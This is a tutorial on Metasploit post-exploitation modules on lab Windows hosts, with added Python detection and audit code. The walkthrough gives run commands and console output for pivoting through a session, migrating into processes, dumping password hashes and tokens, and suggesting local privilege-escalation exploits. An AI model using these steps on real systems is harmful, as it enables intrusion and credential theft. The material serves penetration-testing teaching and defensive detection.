Metasploit: Post Exploitation

References:
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/

autoroute

This one is important!
The “autoroute” post module creates a new route through a Meterpreter session, allowing you to pivot deeper into a target network.

meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD

[*] Running module against V-MAC-XP
[*] Adding a route to 192.168.218.0/255.255.255.0...
meterpreter > 
Background session 5? [y/N]  y

After that, further modules can reach the internal subnet through this route, as the port scan below shows.

msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24
RHOSTS => 192.168.218.0/24
msf auxiliary(tcp) > set THREADS 50
THREADS => 50
msf auxiliary(tcp) > set PORTS 445
PORTS => 445
msf auxiliary(tcp) > run

[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] 192.168.218.136:445 - TCP OPEN
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 210 of 256 hosts (082% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
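From the defender's side, the pivoted scan above is visible on the wire: one internal host opening connections to many neighbours on the same port in a short window. The following is an added example, not part of the original post and not Metasploit code; it runs simple sweep detection over constructed NetFlow-style records whose "ts src dst dport proto" layout is an assumption of this example.

```python
"""Flag a single internal host sweeping TCP/445 across a subnet.

Added example, not part of the original post or of Metasploit: a portscan
run through a pivot route appears on the network as one source address
opening connections to many distinct hosts on one port within a short
window. Flow records and their "ts src dst dport proto" layout are
constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed flow export layout: ISO timestamp, source IP, destination IP, port, protocol.
FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<dport>\d+)\s+(?P<proto>\w+)$"
)


def parse_flow(line):
    """Return (timestamp, src, dst, dport, proto) or None for unparseable lines."""
    m = FLOW_RE.match(line.strip())
    if m is None:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"],
            int(m["dport"]), m["proto"].lower())


def detect_port_sweeps(lines, port=445, threshold=20, window=timedelta(minutes=5)):
    """Return [(src, window_start, distinct_hosts)] for every source that
    contacted at least `threshold` distinct hosts on `port` within one
    fixed window of length `window`; sorted so output is deterministic."""
    span = window.total_seconds()
    buckets = defaultdict(set)  # (src, window_start) -> {dst, ...}
    for line in lines:
        rec = parse_flow(line)
        if rec is None:
            continue
        ts, src, dst, dport, proto = rec
        if proto != "tcp" or dport != port:
            continue
        # Fixed windows aligned to midnight, so the bucketing is timezone-independent.
        midnight = ts.replace(hour=0, minute=0, second=0, microsecond=0)
        offset = (ts - midnight).total_seconds()
        start = midnight + timedelta(seconds=offset - offset % span)
        buckets[(src, start)].add(dst)
    return sorted((src, start, len(dsts))
                  for (src, start), dsts in buckets.items() if len(dsts) >= threshold)


# Constructed sample: one host touching 60 neighbours on 445 within a minute,
# plus ordinary workstation-to-file-server traffic and one malformed line.
_base = datetime(2017, 5, 1, 17, 20, 0)
SAMPLE_FLOWS = [
    f"{(_base + timedelta(seconds=i)).isoformat()} 192.168.218.5 192.168.218.{100 + i} 445 tcp"
    for i in range(60)
] + [
    f"{(_base + timedelta(minutes=1)).isoformat()} 192.168.218.20 192.168.218.2 445 tcp",
    f"{(_base + timedelta(minutes=2)).isoformat()} 192.168.218.21 192.168.218.2 445 tcp",
    f"{(_base + timedelta(minutes=2)).isoformat()} 192.168.218.21 192.168.218.2 80 tcp",
    "this line is not a flow record",
]

if __name__ == "__main__":
    for src, start, count in detect_port_sweeps(SAMPLE_FLOWS):
        print(f"{start.isoformat()} {src} contacted {count} hosts on tcp/445")
```

The threshold and window are tuning knobs: a file server's clients all talk to one host, so they never trip the check, while a sweep touches many hosts from one source. Fixed windows can split a slow sweep across two buckets, so a production version would use a sliding window or lower the threshold.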

migrate

The “migrate” post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1092)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 672
[*] New server process: Explorer.EXE (672)
meterpreter >
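Migration has a recognisable footprint in endpoint telemetry: the original process holds an outbound connection, creates a remote thread in the target process, and the target process then opens a connection to the same remote endpoint. The following is an added example, not part of the original post and not Metasploit code; it correlates constructed Sysmon-style records (Event ID 3 NetworkConnect and Event ID 8 CreateRemoteThread, with Sysmon's field names) whose PIDs and remote address (192.0.2.10, a documentation address) are made up.

```python
"""Spot a Meterpreter-style process migration in Sysmon telemetry.

Added example, not from the original post or from Metasploit. The event
records are constructed dicts in the shape a log shipper would emit from
Sysmon XML; field names follow Sysmon's, the PIDs and the remote address
192.0.2.10 are made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


SAMPLE_EVENTS = [
    # svchost already has a connection to the remote endpoint ...
    {"EventID": 3, "UtcTime": _t("2017-05-01 09:20:00"),
     "Image": r"C:\Windows\System32\svchost.exe", "ProcessId": 1092,
     "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    # ... creates a thread inside explorer ...
    {"EventID": 8, "UtcTime": _t("2017-05-01 09:21:05"),
     "SourceImage": r"C:\Windows\System32\svchost.exe", "SourceProcessId": 1092,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 672},
    # ... and explorer then talks to the same endpoint.
    {"EventID": 3, "UtcTime": _t("2017-05-01 09:21:06"),
     "Image": r"C:\Windows\explorer.exe", "ProcessId": 672,
     "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    # Benign: a remote thread with no matching connection on either side.
    {"EventID": 8, "UtcTime": _t("2017-05-01 09:22:00"),
     "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 400,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 672},
    # Benign: explorer talking to a file server, unrelated to any injection.
    {"EventID": 3, "UtcTime": _t("2017-05-01 09:25:00"),
     "Image": r"C:\Windows\explorer.exe", "ProcessId": 672,
     "DestinationIp": "192.168.218.2", "DestinationPort": 445},
]


def find_migrations(events, max_gap=timedelta(minutes=10)):
    """Return one finding per CreateRemoteThread event whose source process
    had an outbound connection to some endpoint within `max_gap` before the
    injection and whose target process connected to that same endpoint
    within `max_gap` after it."""
    conns = defaultdict(list)  # pid -> [(time, (ip, port))]
    for e in events:
        if e["EventID"] == 3:
            conns[e["ProcessId"]].append(
                (e["UtcTime"], (e["DestinationIp"], e["DestinationPort"])))

    findings = []
    for e in events:
        if e["EventID"] != 8:
            continue
        t = e["UtcTime"]
        before = {ep for ts, ep in conns[e["SourceProcessId"]] if t - max_gap <= ts <= t}
        after = {ep for ts, ep in conns[e["TargetProcessId"]] if t <= ts <= t + max_gap}
        for endpoint in sorted(before & after):
            findings.append({
                "time": t,
                "source": (e["SourceImage"], e["SourceProcessId"]),
                "target": (e["TargetImage"], e["TargetProcessId"]),
                "remote": endpoint,
            })
    return findings


if __name__ == "__main__":
    for f in find_migrations(SAMPLE_EVENTS):
        print(f"{f['time']} {f['source']} -> {f['target']} sharing {f['remote']}")
```

Event ID 8 on its own is noisy (csrss, antivirus and accessibility tools all create remote threads), which is why the correlation with a shared remote endpoint is the useful signal. Real pipelines should key on Sysmon's ProcessGuid rather than the PID, since PIDs are reused.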

checkvm (check whether the host is a virtual machine)

The “checkvm” post module checks to see if the compromised host is a virtual machine. It supports Hyper-V, VMware, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm 

[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

credential_collector (collect credentials)

The “credential_collector” post module harvests password hashes and tokens on the compromised host.

meterpreter > run post/windows/gather/credentials/credential_collector 

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

dumplinks (dump existing shortcut files)

The “dumplinks” module parses the .lnk files in a user's Recent Documents folder, which can be useful for further information gathering. Note that, as shown below, we first need to migrate into a user process before running the module.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks 

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >
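The same .lnk files are a standard forensic artefact: each one records the target's timestamps, size and path strings, which is what dumplinks extracts. The following is an added example, not the dumplinks code and not part of the original post; it is a minimal parser for the fixed ShellLinkHeader and the StringData block as defined in MS-SHLLINK, and the sample file, its paths and its timestamps are constructed inside the block.

```python
"""Minimal Windows Shell Link (.lnk) parser, the format dumplinks walks.

Added forensic example, not Metasploit's dumplinks code: it decodes the
76-byte ShellLinkHeader and the StringData block from MS-SHLLINK, skipping
the optional LinkTargetIDList and LinkInfo structures, to recover the
timestamps, file size and path strings a Recent-folder shortcut carries.
The sample .lnk is constructed by build_sample_lnk(); its contents are made up.
"""
import struct
from datetime import datetime, timedelta, timezone

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_FMT = "<I16sIIQQQIIIHHII"  # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, ...
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 76 == 0x4C
LINK_FLAGS = {  # MS-SHLLINK 2.1.1, low byte only
    "HasLinkTargetIDList": 0x01, "HasLinkInfo": 0x02, "HasName": 0x04,
    "HasRelativePath": 0x08, "HasWorkingDir": 0x10, "HasArguments": 0x20,
    "HasIconLocation": 0x40, "IsUnicode": 0x80,
}
# StringData fields in on-disk order, with the flag that says each is present.
STRING_FIELDS = [("NAME_STRING", "HasName"), ("RELATIVE_PATH", "HasRelativePath"),
                 ("WORKING_DIR", "HasWorkingDir"), ("COMMAND_LINE_ARGUMENTS", "HasArguments"),
                 ("ICON_LOCATION", "HasIconLocation")]
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def is_shell_link(data):
    """Cheap signature check: HeaderSize must be 0x4C and the CLSID must match."""
    return (len(data) >= HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == HEADER_SIZE
            and data[4:20] == LINK_CLSID)


def parse_lnk(data):
    if not is_shell_link(data):
        raise ValueError("not a Shell Link: bad HeaderSize or CLSID")
    (_, _, flags, attrs, ctime, atime, wtime, fsize,
     _icon_index, show_cmd, _hotkey, _, _, _) = struct.unpack_from(HEADER_FMT, data, 0)
    offset = HEADER_SIZE
    if flags & LINK_FLAGS["HasLinkTargetIDList"]:
        # IDListSize (uint16) is followed by that many bytes of item IDs.
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & LINK_FLAGS["HasLinkInfo"]:
        # LinkInfoSize (uint32) counts the whole LinkInfo structure, itself included.
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & LINK_FLAGS["IsUnicode"])
    strings = {}
    for name, flag in STRING_FIELDS:
        if not flags & LINK_FLAGS[flag]:
            continue
        count = struct.unpack_from("<H", data, offset)[0]  # characters, not bytes
        width = 2 if unicode else 1
        raw = data[offset + 2: offset + 2 + count * width]
        strings[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        offset += 2 + count * width
    return {
        "flags": sorted(n for n, bit in LINK_FLAGS.items() if flags & bit),
        "file_attributes": attrs,
        "creation_time": filetime_to_datetime(ctime),
        "access_time": filetime_to_datetime(atime),
        "write_time": filetime_to_datetime(wtime),
        "file_size": fsize,
        "show_command": show_cmd,
        "strings": strings,
    }


def build_sample_lnk(write_time=datetime(2011, 4, 21, 19, 9, 42, tzinfo=timezone.utc)):
    """Construct a small but valid .lnk: header, an empty IDList, three strings."""
    flags = (LINK_FLAGS["HasLinkTargetIDList"] | LINK_FLAGS["HasName"]
             | LINK_FLAGS["HasRelativePath"] | LINK_FLAGS["HasWorkingDir"] | LINK_FLAGS["IsUnicode"])
    ft = datetime_to_filetime(write_time)
    header = struct.pack(HEADER_FMT, HEADER_SIZE, LINK_CLSID, flags, 0x20,  # FILE_ATTRIBUTE_ARCHIVE
                         ft, ft, ft, 1234, 0, 1, 0, 0, 0, 0)            # size, icon, SW_SHOWNORMAL
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDListSize=2: just the TerminalID

    def s(text):  # CountCharacters followed by the UTF-16LE string, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list + s("notes") + s(r".\notes.txt") + s(r"C:\Users\admin\Documents")


if __name__ == "__main__":
    info = parse_lnk(build_sample_lnk())
    print(info["write_time"].isoformat(), info["file_size"], info["strings"])
```

The LinkInfo structure (volume and local base path) and the item ID list carry the absolute target path and are skipped here; a full parser would decode them as well, and the three FILETIMEs describe the target at link-creation time, not the shortcut file itself.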

enum_applications (list installed applications)

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on WIN7-X86

Installed Applications
======================

 Name                                                              Version
 ----                                                              -------
 Adobe Flash Player 25 ActiveX                                     25.0.0.148
 Google Chrome                                                     58.0.3029.81
 Google Update Helper                                              1.3.33.5
 Google Update Helper                                              1.3.25.11
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148
 MySQL Connector Net 6.5.4                                         6.5.4
 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2
 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1
 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1
 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1
 VMware Tools                                                      10.1.6.5214329
 XAMPP 1.8.1-0                                                     1.8.1-0


[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txt
meterpreter >

hashdump

The “hashdump” post module will dump the local user accounts on the compromised host using the registry.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::


meterpreter >
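Output in this user:rid:LM:NT::: form can be audited for weak credential storage: accounts with an empty password, accounts whose LM hash is still stored (an unsalted, case-insensitive hash that should be disabled by policy), an LM second half equal to the empty block (the password is at most seven characters), and accounts sharing one NT hash (the same password reused). The following is an added example, not part of the original post and not Metasploit code; its sample reuses the four lines above plus one constructed "backup" account.

```python
"""Audit pwdump-style hashdump output for weak credential storage.

Added defensive example, not from the post or from Metasploit. Each line is
user:rid:LM:NT:::. The sample reuses the four lines shown on the page plus
one constructed 'backup' account that shares Administrator's NT hash.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is off or the password is empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)


def parse_pwdump_line(line):
    """Return (user, rid, lm, nt) with lowercase hex, or None if not a pwdump line."""
    m = PWDUMP_RE.match(line.strip())
    if m is None:
        return None
    return (m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower())


def audit_hashdump(text):
    """Classify every account in a hashdump; non-matching lines are counted as skipped."""
    empty, lm_stored, short_lm, by_nt, skipped = [], [], [], defaultdict(list), 0
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_pwdump_line(line)
        if rec is None:
            skipped += 1
            continue
        user, _rid, lm, nt = rec
        if nt == EMPTY_NT:
            empty.append(user)
        if lm != EMPTY_LM:
            lm_stored.append(user)
            # LM hashes two 7-character halves independently; an empty second
            # half means the password is no longer than 7 characters.
            if lm[16:] == EMPTY_LM[16:]:
                short_lm.append(user)
        by_nt[nt].append(user)
    shared = {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != EMPTY_NT}
    return {"empty_password": empty, "lm_stored": lm_stored,
            "short_lm_password": short_lm, "shared_nt": shared, "skipped": skipped}


# Constructed sample: the page's four accounts plus a made-up 'backup' account.
SAMPLE_DUMP = """\
Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
backup:1003:aad3b435b51404eeaad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
[*] Dumping password hashes...
"""

if __name__ == "__main__":
    for finding, value in audit_hashdump(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```

The dump does not say whether an account is disabled, so a flagged Guest account with an empty password still has to be checked against the account's status before it is treated as a live risk.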

usb_history

The “usb_history” module enumerates the USB drive history on the compromised system.

meterpreter > run post/windows/gather/usb_history 

[*] Running module against V-MAC-XP
[*] 
   C:                                                                Disk ea4cea4c 
   E:   STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:   FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:   IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime                       Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime                       Thu Apr 21 13:09:43 -0600 2011
             Manufacturer                               (Standard disk drives)
           ParentIdPrefix                                         8&3a01dffe&0 (   E:)
                    Class                                            DiskDrive
                   Driver          {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

meterpreter >

local_exploit_suggester

Check which points on the host are still exploitable.

msf > use post/multi/recon/local_exploit_suggester 
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          2                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed